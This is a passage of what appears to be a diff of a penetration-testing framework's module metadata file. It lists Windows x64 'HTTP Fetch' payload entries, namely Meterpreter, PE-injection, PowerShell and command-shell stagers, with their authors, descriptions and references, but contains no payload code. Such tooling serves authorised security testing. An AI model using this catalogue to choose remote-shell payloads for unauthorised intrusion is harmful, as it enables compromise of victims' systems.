"payload_cmd/windows/http/x64/meterpreter/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_winhttp": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/meterpreter/reverse_winhttps": { - "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/http/x64/meterpreter_bind_named_pipe": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_bind_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_http": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_https": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/peinject/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/peinject/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/peinject/reverse_named_pipe": { - "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/pingback_reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/http/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_bind_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_reverse_tcp_ssl": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - 